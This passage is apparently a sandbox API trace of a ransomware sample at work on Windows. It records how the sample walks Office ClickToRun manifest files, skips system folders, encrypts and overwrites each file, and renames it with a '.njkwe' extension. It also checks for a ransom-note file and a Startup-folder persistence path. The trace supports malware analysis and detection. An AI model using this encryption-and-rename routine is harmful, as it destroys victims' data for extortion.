lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.281] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.281] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.281] GetProcessHeap () returned 0xbe0000 [0070.281] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.281] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.281] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.475] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.475] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.476] CloseHandle (hObject=0x434) returned 1 [0070.476] GetProcessHeap () returned 0xbe0000 [0070.476] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.476] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 145 [0070.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.476] GetProcessHeap () returned 0xbe0000 [0070.476] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.477] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed578aca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed578aca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd32bedda, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5b94, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.lyncmui.msi.16.en-us.xml", cAlternateFileName="C2FCD6~1.XML")) returned 1 [0070.477] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.477] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.477] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.477] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.477] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.477] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml") returned 115 [0070.477] StrStrIW (lpFirst="C2RManifest.lyncmui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.477] lstrcmpW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.477] lstrcmpW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.477] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.e", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.477] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.477] GetTickCount () returned 0x1151fd9 [0070.477] GetTickCount () returned 0x1151fd9 [0070.477] GetTickCount () returned 0x1151fd9 [0070.477] GetTickCount () returned 0x1151fd9 [0070.477] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.477] GetProcessHeap () returned 0xbe0000 [0070.477] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.477] ReadFile (in: hFile=0x434, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.483] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.484] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.484] GetProcessHeap () returned 0xbe0000 [0070.484] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.484] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.484] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.484] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.484] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.484] CloseHandle (hObject=0x434) returned 1 [0070.484] GetProcessHeap () returned 0xbe0000 [0070.484] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.484] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 135 [0070.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.485] GetProcessHeap () returned 0xbe0000 [0070.485] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.485] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5063b1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed5063b1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3593a88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6b4a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.office32mui.msi.16.en-us.xml", cAlternateFileName="C2BADD~1.XML")) returned 1 [0070.485] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.485] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.485] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.485] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.485] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.485] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml") returned 119 [0070.485] StrStrIW (lpFirst="C2RManifest.office32mui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.485] lstrcmpW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.485] lstrcmpW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.485] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.485] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.486] GetTickCount () returned 0x1151fe8 [0070.486] GetTickCount () returned 0x1151fe8 [0070.486] GetTickCount () returned 0x1151fe8 [0070.486] GetTickCount () returned 0x1151fe8 [0070.486] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.486] GetProcessHeap () returned 0xbe0000 [0070.486] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.486] ReadFile (in: hFile=0x434, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.488] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.488] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.488] GetProcessHeap () returned 0xbe0000 [0070.488] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.488] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.489] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.489] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.489] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.489] CloseHandle (hObject=0x434) returned 1 [0070.489] GetProcessHeap () returned 0xbe0000 [0070.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.489] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 139 [0070.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.490] GetProcessHeap () returned 0xbe0000 [0070.490] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.490] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed3d50b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed3d50b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2cc8f5f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4f3f4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.office32ww.msi.16.x-none.xml", cAlternateFileName="C2EBFE~1.XML")) returned 1 [0070.490] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.490] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.490] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.490] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.490] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.490] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml") returned 119 [0070.490] StrStrIW (lpFirst="C2RManifest.office32ww.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.490] lstrcmpW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.490] lstrcmpW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.490] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.1", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.490] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.491] GetTickCount () returned 0x1151fe8 [0070.491] GetTickCount () returned 0x1151fe8 [0070.491] GetTickCount () returned 0x1151fe8 [0070.491] GetTickCount () returned 0x1151fe8 [0070.491] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.491] GetProcessHeap () returned 0xbe0000 [0070.491] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.491] ReadFile (in: hFile=0x434, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.493] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.493] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.493] GetProcessHeap () returned 0xbe0000 [0070.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.493] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.493] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.495] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.495] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.495] CloseHandle (hObject=0x434) returned 1 [0070.497] GetProcessHeap () returned 0xbe0000 [0070.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.497] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 139 [0070.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.497] GetProcessHeap () returned 0xbe0000 [0070.497] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.497] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed31650e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed31650e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd36c4db5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19870, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.officemui.msi.16.en-us.xml", cAlternateFileName="C29059~1.XML")) returned 1 [0070.497] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.497] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.497] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.497] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.497] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.497] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml") returned 117 [0070.497] StrStrIW (lpFirst="C2RManifest.officemui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.497] lstrcmpW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.497] lstrcmpW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.497] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.498] GetTickCount () returned 0x1151ff8 [0070.498] GetTickCount () returned 0x1151ff8 [0070.498] GetTickCount () returned 0x1151ff8 [0070.498] GetTickCount () returned 0x1151ff8 [0070.498] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.498] GetProcessHeap () returned 0xbe0000 [0070.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.499] ReadFile (in: hFile=0x434, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.501] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.501] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.501] GetProcessHeap () returned 0xbe0000 [0070.501] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.501] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.501] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, 